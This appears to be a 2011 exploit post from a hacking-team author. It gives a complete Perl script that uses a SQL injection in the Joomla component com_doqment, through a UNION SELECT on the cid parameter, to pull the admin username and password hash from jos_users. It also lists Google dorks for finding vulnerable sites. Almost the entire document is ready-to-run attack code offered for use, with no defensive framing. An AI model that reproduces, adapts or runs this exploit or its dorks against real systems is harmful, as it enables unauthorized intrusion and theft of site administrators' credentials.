[D] PERL : Joomla com_doqment (DOC) Sql injection Vulnerability [z]
2011-01-14 15:51:24Inviato da: kedans
=-=-=-=-=-=-=-={In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# [D] PERL : Joomla com_doqment (DOC) Sql injection Vulnerability [z]
# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com >
# Team : [D] HaCkErS-StreeT-Team [Z]
# + Allah Akbarr + Algerians HaCkErs
# Type : Perl
:::::::::::::::::::::::::(0xSTART):::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl
#Joomla com_doqment (DOC) Sql injection
#Author KedAns-Dz
#Gre4tz: All HaCkerS-StreeT-Team DZ
#Special Gre4tz: Dr.Ride + Red1One + Islampard
print "|----------------------------------------------------|\n";
print "| KedAns ' Joomla com_doqment SQL Injection ' |\n";
print "| |\n";
print "| Author by : KedAns-Dz |\n";
print "| |\n";
print "| Special ThanX f4r : exploit-db.com & bugsearch.net |\n";
print "| |\n";
print "| Team : [D] HaCkerS-StreeT-Team [Z] |\n";
print "| |\n";
print "| Special GreeTz : Dr.Ride + Islampard + BadR0 |\n";
print "| |\n";
print "| E-Mails : ked-h (at) hotmail (dot) com |\n";
print "| |\n";
print "| : k-_-k1 (at) live (dot) fr |\n";
print "|----------------------------------------------------|\n";
print " \n";
print " \n";
print "|**********************************************************|\n";
print "[+] Vendor : http://www.joomla.com\n";
print "[+] script : com_doqment \n";
print "[+] Download : http://www.joomla.com\n";
print "[+] Vulnerability : SQL Vulnerability\n";
print "[+] Dork : inurl:com_doqment \n";
print "[+] Dork : allintext:Powered by Joomla. \n";
print "|***********************************************************|\n";
print " \n";
use LWP::UserAgent;
print "\n > SQL Target: 'http://target.com/path/' : ";
chomp(my $target=<STDIN>);
#Nome Column
$kontol="concat(username,0x3a,password)";
#Nome Table
$memek="jos_users";
$ngentot="-11/**/union/**/select/**/";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?option=com_doqment&cid=".$ngentot."1,2,".$kontol.",4,5,6,7,8/**/from/**/".$memek."--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "Exploit succeeded !! ...\n";
print "..:: By KedAns-Dz ::.\n";
print "\n";
print " ->> HaCkerS-StreeT-Team : ";
print "KedAns-Dz + BadR0 + Dr.Ride + Red1One + XoreR + FOX-DZ + Islampard + NoR0 FouinY + Zaki.ENG + Hani NiN0\n";
print "Allaho Akbar\n";
print "\n";
}
else{print "\n[-] Errur Exploit!...\n";
}
# By KedAns-Dz
:::::::::::::::::::::::::::::(0xEOF):::::::::::::::::::::::::::::::::::::::
# [D] HaCkerS-StreeT-Team [Z] > Algerians HaCkErs <
-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.